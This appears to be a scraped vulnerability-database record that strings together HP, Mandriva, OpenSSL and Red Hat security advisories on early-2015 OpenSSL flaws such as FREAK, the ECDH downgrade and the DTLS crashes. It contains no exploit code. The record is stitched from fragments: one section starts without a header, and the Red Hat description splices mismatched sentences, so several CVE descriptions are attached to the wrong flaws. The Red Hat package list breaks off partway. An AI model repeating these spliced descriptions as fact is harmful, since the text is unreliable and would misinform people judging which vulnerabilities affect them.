"PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-30T00:00:00", "db": "VULMON", "id": "CVE-2016-2517" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88189" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2017-01-30T21:59:01.033000", "db": "NVD", "id": "CVE-2016-2517" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-11-21T00:00:00", "db": "VULMON", "id": "CVE-2016-2517" }, { "date": "2016-09-08T18:00:00", "db": "BID", "id": "88189" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "date": "2017-11-21T02:29:04.040000", "db": "NVD", "id": "CVE-2016-2517" }, { "date": "2017-02-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-608" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-608" } ], "trust": 0.6 } }
var-201501-0436
Vulnerability from variot
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message. OpenSSL is prone to a security-bypass vulnerability. Successfully exploiting these issues may allow attackers to perform unauthorized actions. This may lead to other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04604357
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04604357 Version: 1
HPSBGN03299 rev.1 - HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL, Remote Disclosure of Information, Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-03-19 Last Updated: 2015-03-19
Potential Security Impact: Remote disclosure of information, unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent running OpenSSL including:
The SSL vulnerability known as "FREAK", which could be exploited remotely to allow disclosure of information. Other vulnerabilities which could be exploited remotely resulting in unauthorized access.
References:
CVE-2014-3570 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 SSRT101987
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. CVE-2014-3572 and CVE-2015-0204
HP IceWall MCRP Version 2.1 and 3.0
HP IceWall SSO Dfw Version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and Version 10.0
HP IceWall SSO Certd Version 8.0R3 with DB plugin patch 2 and Version
10.0 HP IceWall Federation Agent Version 3.0
CVE-2014-3570 and CVE-2014-8275
HP IceWall MCRP v2.1, v3.0
HP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0
HP IceWall SSO Agent v8.0 and v8.0 2007 Update Release 2
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP recommends the following software updates and workaround instructions to resolve the vulnerabilities for HP IceWall SSO Dfw, SSO Certd, MCRP, and Federation Agent. IceWall SSO Dfw 10.0 and Certd 10.0, which are running on RHEL, could be using either the OS bundled OpenSSL library or the OpenSSL bundled with HP IceWall. If still using the OpenSSL bundled with HP IceWall, please switch to the OpenSSL library bundled with the OS, and then follow the instructions in step 3.
Documents are available at the following location with instructions to
switch to the OS bundled OpenSSL library:
http://www.hp.com/jp/icewall_patchaccess
2. For IceWall SSO Dfw and Certd for SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3,
and SSO Certd 8.0 R3 with DB plugin patch 2, which bundle OpenSSL, please download the updated OpenSSL at the following location:
http://www.hp.com/jp/icewall_patchaccess
3. For HP IceWall products running on RHEL and are using the OS bundled
OpenSSL, RHEL has provided patch or mitigation instructions at the following location:
https://access.redhat.com/articles/1369543
Note: For RHEL6 (only) and CVE-2014-8275, please apply the RHEL6 patch
for OpenSSL from the following location:
https://access.redhat.com/security/cve/CVE-2014-8275
4. For IceWall products running on HP-UX which are using the OS bundled
OpenSSL, please apply the HP-UX OpenSSL update from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?produ
ctNumber=OPENSSL11I
WORKAROUND INSTRUCTIONS
HP recommends the following information to protect against potential risk from CVE-2014-3572 and CVE-2015-0204 for the following HP IceWall products.
HP IceWall SSO Dfw and MCRP
- If possible, do not use the SHOST setting which allows IceWall SSO
Dfw or MCRP to use SSL/TLS protocol to back-end web servers.
- If possible, do not use EXPORT-grade ciphers on the back-end web
servers.
HP IceWall SSO Certd (version 10.0 and 8.0R3 applied DB plugin patch
release 2)
- If possible, do not use the LDAPSSL setting which allows IceWall SSO
Certd to connect to the LDAP server using SSL/TLS protocol.
- If possible, do not use EXPORT-grade ciphers on the LDAP server.
IceWall Federation Agent
- If possible, use "bindings:HTTP-POST" instead of
"bindings:HTTP-Artifact" setting in the service provider meta file. The "bindings:HTTP-POST" setting would disable IWFA to use SSL for communicating with IdP server.
Note: The HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 19 March 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem.
The updated packages have been upgraded to the 1.0.0p version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 https://www.openssl.org/news/secadv_20150108.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb LHbCdAkBpYHYSuaUwpiAu1w= =ePa9 -----END PGP SIGNATURE----- . Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins. OpenSSL Security Advisory [08 Jan 2015] =======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due to a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain conditions. In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also provided an initial patch. Further analysis was performed by Matt Caswell of the OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite using an ECDSA certificate if the server key exchange message is omitted. This effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. A server could present a weak temporary key and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.
DH client certificates accepted without verification [Server] (CVE-2015-0205)
Severity: Low
An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. This effectively allows a client to authenticate without the use of a private key. This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS program and reported to OpenSSL on 1st December 2014 by NCSC-FI Vulnerability Co-ordination. Another variant was independently reported to OpenSSL on 12th December 2014 by Konrad Kraszewski from Google. Further analysis was conducted and fixes were developed by Stephen Henson of the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some platforms, including x86_64. This bug occurs at random with a very low probability, and is not known to be exploitable in any way, though its exact impact is difficult to determine. The following has been determined:
) The probability of BN_sqr producing an incorrect result at random is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and 1/2^128 on affected 64-bit platforms. ) On most platforms, RSA follows a different code path and RSA operations are not affected at all. For the remaining platforms (e.g. OpenSSL built without assembly support), pre-existing countermeasures thwart bug attacks [1]. ) Static ECDH is theoretically affected: it is possible to construct elliptic curve points that would falsely appear to be on the given curve. However, there is no known computationally feasible way to construct such points with low order, and so the security of static ECDH private keys is believed to be unaffected. ) Other routines known to be theoretically affected are modular exponentiation, primality testing, DSA, RSA blinding, JPAKE and SRP. No exploits are known and straightforward bug attacks fail - either the attacker cannot control when the bug triggers, or no private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille (Blockstream) who also suggested an initial fix. Further analysis was conducted by the OpenSSL development team and Adam Langley of Google. The final fix was developed by Andy Polyakov of the OpenSSL core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0066-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html Issue date: 2015-01-20 Updated on: 2015-01-21 CVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer dereference flaw was found in the DTLS implementation of OpenSSL. A remote attacker could send a specially crafted DTLS message, which would cause an OpenSSL server to crash. A remote attacker could send multiple specially crafted DTLS messages to exhaust all available memory of a DTLS server. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. (CVE-2014-3570)
It was discovered that OpenSSL would perform an ECDH key exchange with a non-ephemeral key even when the ephemeral ECDH cipher suite was selected. An attacker could use these flaws to modify an X.509 certificate to produce a certificate with a different fingerprint without invalidating its signature, and possibly bypass fingerprint-based blacklisting in applications. (CVE-2015-0205)
All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to mitigate the above issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites 1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record 1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record 1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-1.0.1e-30.el6_6.5.ppc.rpm openssl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-1.0.1e-30.el6_6.5.s390.rpm openssl-1.0.1e-30.el6_6.5.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-devel-1.0.1e-30.el6_6.5.s390.rpm openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
